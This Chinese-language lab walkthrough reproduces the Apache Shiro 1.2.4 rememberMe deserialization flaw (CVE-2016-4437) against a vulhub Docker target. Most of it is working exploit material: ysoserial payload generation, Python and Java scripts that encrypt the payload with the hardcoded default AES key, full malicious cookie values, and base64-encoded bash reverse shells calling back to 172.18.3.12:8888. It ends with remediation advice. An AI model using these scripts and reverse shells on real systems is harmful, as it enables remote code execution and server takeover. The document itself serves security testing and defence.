Apache Shiro 1.2.4 反序列化漏洞Shiro-550（CVE-2016-4437）-深圳市維司達科技有限公司

Apache Shiro 1.2.4 反序列化漏洞Shiro-550（CVE-2016-4437）

一、漏洞简介

1、Apache Shiro

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

2、影响范围

Apache Shiro ≤ 1.2.4（所有版本）

包括：1.2.4、1.2.3、1.2.2、1.2.1、1.2.0、1.1.x、1.0.x 等

修复版本：1.2.5 及以上（含 1.3.x、1.4.x、1.5.x、1.6.x、1.7.x、1.8.x、2.x）

3、漏洞原理

Shiro 1.2.4 及以下版本，记住我功能使用固定硬编码 AES 密钥，且对 Cookie 里的 rememberMe 数据直接解密反序列化无校验；攻击者利用默认密钥构造恶意序列化载荷，即可远程代码执行。

二、环境准备

1、搭建靶机

# 进入目录[root@localhost vulhub]# cd shiro# 查看目录[root@localhost shiro]# lsCVE-2010-3863 CVE-2016-4437 CVE-2020-1957# 进入目录[root@localhost shiro]# cd CVE-2016-4437/# 搭建环境[root@localhost CVE-2016-4437]# docker compose up -d# 查看容器[root@localhost CVE-2016-4437]# docker ps

2、下载ysoserial

# 通过代理下载ysoserial┌──(root㉿kali)-[~]└─# proxychains wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial-all.jar# 查看┌──(root㉿kali)-[~]└─# lsDesktop Documents Downloads EHole Music Pictures Public Templates Videos ysoserial-0.0.6-all.jar# 测试是否能正常使用┌──(root㉿kali)-[~]└─# java -jar ysoserial-all.jar

找了半天下载地址

3、ACE加密脚本

python版本

importbase64fromCrypto.CipherimportAES# 读取生成的 poc.binwithopen("poc.bin","rb")asf:payload=f.read()# Shiro 默认密钥key=base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")# 生成随机IViv=AES.new(key,AES.MODE_CBC).iv# PKCS7 填充defpad(s):bs=AES.block_sizereturns+(bs-len(s)%bs)*bytes([bs-len(s)%bs])# 加密payload=pad(payload)encrypted=AES.new(key,AES.MODE_CBC,iv).encrypt(payload)# 输出最终 rememberMeresult=base64.b64encode(iv+encrypted).decode()print("rememberMe="+result)

JAVA版本

package org.vulhub.shirodemo; import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.codec.CodecSupport; import org.apache.shiro.util.ByteSource; import org.apache.shiro.codec.Base64; import org.apache.shiro.io.DefaultSerializer; import java.nio.file.FileSystems; import java.nio.file.Files; import java.nio.file.Paths; public class TestRemember { public static void main(String[] args) throws Exception { byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser")); AesCipherService aes = new AesCipherService(); byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA==")); ByteSource ciphertext = aes.encrypt(payloads, key); System.out.printf(ciphertext.toString()); } }

4、生成POC

这里说一下，因为kali的JDK是21版本的，而需要JDK8才能兼容ysoserial，如果你没有使用JDK8去运行就会出现我下面的问题

# 生成POC┌──(root㉿kali)-[~]└─# java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin# 在kali源里下载JDK8(源里没有所以只能去官方下载了)┌──(root㉿kali)-[~]└─# apt install openjdk-8-jdk# 用 Adoptium 官方 API 直链┌──(root㉿kali)-[~]└─# proxychains wget -O jdk8.tar.gz \"https://api.adoptium.net/v3/binary/latest/8/ga/linux/x64/jdk/hotspot/normal/eclipse"

# 解压┌──(root㉿kali)-[~]└─# tar -xvf jdk8.tar.gz# 转移┌──(root㉿kali)-[~]└─# mv jdk8u492-b09 /opt/jdk8# 加别名┌──(root㉿kali)-[~]└─# alias java8='/opt/jdk8/bin/java'# POC生成┌──(root㉿kali)-[~]└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin

三、漏洞复现

1、访问主页

2、生成rememberMe

# 生成rememberMe ┌──(root㉿kali)-[~] └─# python shiro_exp.py # 安装pycryptodome库 ┌──(root㉿kali)-[~] └─# pip3 install pycryptodome # 新版 Kali 的系统保护机制，不让直接装 pip 包，所以要使用参数来下载 ┌──(root㉿kali)-[~] └─# pip3 install pycryptodome --break-system-packages

┌──(root㉿kali)-[~]└─# python shiro_exp.pyrememberMe=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

3、发包攻击

先去容器里面看一下是否有success文件

# 查看容器[root@localhost ~]# docker ps# 查看容器tmp目录[root@localhost ~]# docker exec 02fbc4cedb3d ls -la /tmp

再次查看tmp目录，发现已经创建了文件，攻击成功

4、反弹shell

# tcp的反弹shell案例bash-i>&/dev/tcp/172.18.3.12/88880>&1/bin/bash-i>/dev/tcp/172.18.3.12/88880<&2>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}# 生成反弹shell┌──(root㉿kali)-[~]└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > shell.ser# 替换py脚本中的字符串┌──(root㉿kali)-[~]└─# sed -i 's/poc.bin/shell.ser/g' shiro_exp.py# 生成rememberMe┌──(root㉿kali)-[~]└─# python shiro_exp.pyrememberMe=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

监听kali端口8888，并且发包查看是否控制

┌──(root㉿kali)-[~]└─# nc -lvnp 8888listening on[any]8888...

四、其他方式复现

1、shiro反序列化

在攻击主机打开shiro反序列化利用工具，选择漏洞类型为shiro550，地址栏中填入对应的地址，http://192.168.88.130（这里我重新搭建的环境这是IP地址不一样，环境其他的都一样）

2、DNS外带漏洞检测

CEYE是一个用于检测带外数据（Out-of-Band）的监控平台，例如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息，例如SSRF/ XXE/ RCE等（这里如果dnslog没有检测出来换成ceye来检测,两个都不太稳定）

3、利用链成功

4、反弹Shell

#监听8000端口[root@CentOS7 ~]# nc -lvp 8000#查看权限root@1d7284f53b38:/# id#查看IProot@1d7284f53b38:/# ip add

到这里就已经攻击成功了，补充说明一下，Shiro 密钥可能是默认的也可能是其他的，所以和爆破差不多的原理，可以专门去收集或者或者下载密钥，也不只是只有这一个工具使用，比如kali上就可以安装：ShiroAttack2、shiro-exploit等，你也可以自己写python脚本

五、修复建议

1、漏洞成因

Shiro 默认硬编码 AES 密钥kPH+bIxk5D2deZiIxcaaaA==公开泄露；

采用 CBC 模式存在反序列化漏洞；

攻击者可构造恶意rememberMeCookie，触发反序列化 RCE。

2、主要修复

禁止使用默认密钥，重新生成高强度随机 Base64 密钥，配置到shiro.ini/yml 中

升级到：1.2.7 及以上（推荐 1.3.x/ 2.x 稳定版）

业务不需要就直接关闭rememberMe，从根源杜绝漏洞利用。

3、运维防护

WAF 加规则：拦截rememberMe超长恶意 Cookie、特征 payload

定期扫描资产，检测是否存在 Shiro 指纹 + 默认密钥

服务器最小权限运行，降低 RCE 后的危害范围

限制外网访问后台管理接口

六、参考文献

Shiro反序列化漏洞详细分析：https://www.anquanke.com/post/id/228889

Shiro反序列化分析带思路及组件检测笔记：https://xz.aliyun.com/t/8997

Shiro介绍及主要流程：https://www.cnblogs.com/insaneXs/p/10999384.html

https://github.com/vulhub/vulhub/blob/master/shiro/CVE-2016-4437/README.zh-cn.md

Apache Shiro 1.2.4 反序列化漏洞Shiro-550（CVE-2016-4437）